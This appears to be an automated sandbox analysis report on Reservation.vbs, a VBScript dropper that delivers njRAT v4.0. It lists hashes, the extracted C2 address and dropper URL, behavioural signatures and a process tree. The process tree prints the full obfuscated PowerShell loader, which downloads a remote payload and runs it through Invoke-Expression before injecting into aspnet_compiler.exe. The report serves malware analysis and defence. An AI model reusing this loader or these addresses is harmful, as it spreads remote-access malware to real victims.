Analysis
-
max time kernel
150s -
max time network
138s -
platform
windows10_x64 -
resource
win10-en -
submitted
05-09-2021 21:15
Static task
static1
Behavioral task
behavioral1
Sample
Reservation.vbs
Resource
win7-en
windows7_x64
0 signatures
0 seconds
General
-
Target
Reservation.vbs
-
Size
1KB
-
MD5
d1105a626de00b3a3d248febfe9d2eab
-
SHA1
f088bdfa3f5d251f325ff4b11b5e680425c25ba2
-
SHA256
c61844d30e92c490359ae221d04620767e303247345e12de34f8ae43eb1cf26b
-
SHA512
11378362541f0656af2bc775cfd4b8e23e9c9a08cd9eb8b35109f3553da2e870a9c376efd3df2039c4c8224c70ba54ff0cad0030751bdfb8641da4f639e0bc16
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://54.184.87.30/bypass.txt
Extracted
Family
njrat
Version
v4.0
Botnet
Boss
C2
103.147.184.73:7103
Mutex
Windows
Attributes
-
reg_key
Windows
-
splitter
|-F-|
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 7 1580 powershell.exe 17 1580 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 1580 set thread context of 1116 1580 powershell.exe aspnet_compiler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 1580 powershell.exe 1580 powershell.exe 1580 powershell.exe -
Suspicious use of AdjustPrivilegeToken 30 IoCs
Processes:
powershell.exeaspnet_compiler.exedescription pid process Token: SeDebugPrivilege 1580 powershell.exe Token: SeDebugPrivilege 1116 aspnet_compiler.exe Token: 33 1116 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1116 aspnet_compiler.exe Token: 33 1116 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1116 aspnet_compiler.exe Token: 33 1116 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1116 aspnet_compiler.exe Token: 33 1116 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1116 aspnet_compiler.exe Token: 33 1116 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1116 aspnet_compiler.exe Token: 33 1116 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1116 aspnet_compiler.exe Token: 33 1116 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1116 aspnet_compiler.exe Token: 33 1116 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1116 aspnet_compiler.exe Token: 33 1116 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1116 aspnet_compiler.exe Token: 33 1116 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1116 aspnet_compiler.exe Token: 33 1116 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1116 aspnet_compiler.exe Token: 33 1116 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1116 aspnet_compiler.exe Token: 33 1116 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1116 aspnet_compiler.exe Token: 33 1116 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1116 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
WScript.exepowershell.exedescription pid process target process PID 4000 wrote to memory of 1580 4000 WScript.exe powershell.exe PID 4000 wrote to memory of 1580 4000 WScript.exe powershell.exe PID 1580 wrote to memory of 1116 1580 powershell.exe aspnet_compiler.exe PID 1580 wrote to memory of 1116 1580 powershell.exe aspnet_compiler.exe PID 1580 wrote to memory of 1116 1580 powershell.exe aspnet_compiler.exe PID 1580 wrote to memory of 1116 1580 powershell.exe aspnet_compiler.exe PID 1580 wrote to memory of 1116 1580 powershell.exe aspnet_compiler.exe PID 1580 wrote to memory of 1116 1580 powershell.exe aspnet_compiler.exe PID 1580 wrote to memory of 1116 1580 powershell.exe aspnet_compiler.exe PID 1580 wrote to memory of 1116 1580 powershell.exe aspnet_compiler.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Reservation.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $TRUMP ='http://54XXX184XXX87XXX30/bypassXXXtxt'.Replace('XXX','.');$Shib='24=42=20=3d=27=45=54=48=20=43=4f=49=4e=74=2e=57=54=46=20=43=4f=49=4e=6c=49=4f=53=4e=54=27=2e=52=65=70=6c=61=63=65=28=27=45=54=48=20=43=4f=49=4e=27=2c=27=6e=45=27=29=2e=52=65=70=6c=61=63=65=28=27=54=46=20=43=4f=49=4e=27=2c=27=45=62=43=27=29=2e=52=65=70=6c=61=63=65=28=27=4f=53=27=2c=27=65=27=29=3b=24=43=43=20=3d=20=27=44=4f=53=20=43=4f=49=4e=20=4c=53=4f=53=43=4f=49=4e=6e=47=27=2e=52=65=70=6c=61=63=65=28=27=53=20=43=4f=49=4e=20=27=2c=27=57=6e=27=29=2e=52=65=70=6c=61=63=65=28=27=53=4f=27=2c=27=6f=61=44=27=29=2e=52=65=70=6c=61=63=65=28=27=43=4f=49=4e=27=2c=27=54=72=49=27=29=3b=24=41=20=3d=27=49=60=45=6f=73=20=43=4f=49=4e=60=57=60=42=54=43=20=43=4f=49=4e=6a=60=45=54=48=20=43=4f=49=4e=20=24=42=29=2e=24=43=43=28=24=54=52=55=4d=50=29=27=2e=52=65=70=6c=61=63=65=28=27=6f=73=20=43=4f=49=4e=27=2c=27=58=28=6e=60=65=27=29=2e=52=65=70=6c=61=63=65=28=27=42=54=43=20=43=4f=49=4e=27=2c=27=2d=4f=62=27=29=2e=52=65=70=6c=61=63=65=28=27=54=48=20=43=4f=49=4e=27=2c=27=60=63=60=54=27=29=3b=26=28=27=49=27=2b=27=45=58=27=29=28=24=41=20=2d=4a=6f=69=6e=20=27=27=29=7c=26=28=27=49=27=2b=27=45=58=27=29=3b';Invoke-Expression (-join ($Shib -split '=' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1116-162-0x0000000005BF0000-0x0000000005BF1000-memory.dmpFilesize
4KB
-
memory/1116-160-0x00000000055A0000-0x00000000055A1000-memory.dmpFilesize
4KB
-
memory/1116-165-0x0000000005DD0000-0x0000000005DD1000-memory.dmpFilesize
4KB
-
memory/1116-164-0x0000000005BC0000-0x0000000005BC1000-memory.dmpFilesize
4KB
-
memory/1116-154-0x0000000000400000-0x000000000040E000-memory.dmpFilesize
56KB
-
memory/1116-163-0x0000000005C00000-0x0000000005C01000-memory.dmpFilesize
4KB
-
memory/1116-161-0x0000000006100000-0x0000000006101000-memory.dmpFilesize
4KB
-
memory/1116-155-0x000000000040836E-mapping.dmp
-
memory/1580-129-0x000001AC4FD10000-0x000001AC4FD12000-memory.dmpFilesize
8KB
-
memory/1580-142-0x000001AC4FD18000-0x000001AC4FD19000-memory.dmpFilesize
4KB
-
memory/1580-153-0x000001AC51770000-0x000001AC51774000-memory.dmpFilesize
16KB
-
memory/1580-120-0x000001AC51790000-0x000001AC51791000-memory.dmpFilesize
4KB
-
memory/1580-115-0x0000000000000000-mapping.dmp
-
memory/1580-130-0x000001AC4FD13000-0x000001AC4FD15000-memory.dmpFilesize
8KB
-
memory/1580-131-0x000001AC4FD16000-0x000001AC4FD18000-memory.dmpFilesize
8KB
-
memory/1580-124-0x000001AC69F90000-0x000001AC69F91000-memory.dmpFilesize
4KB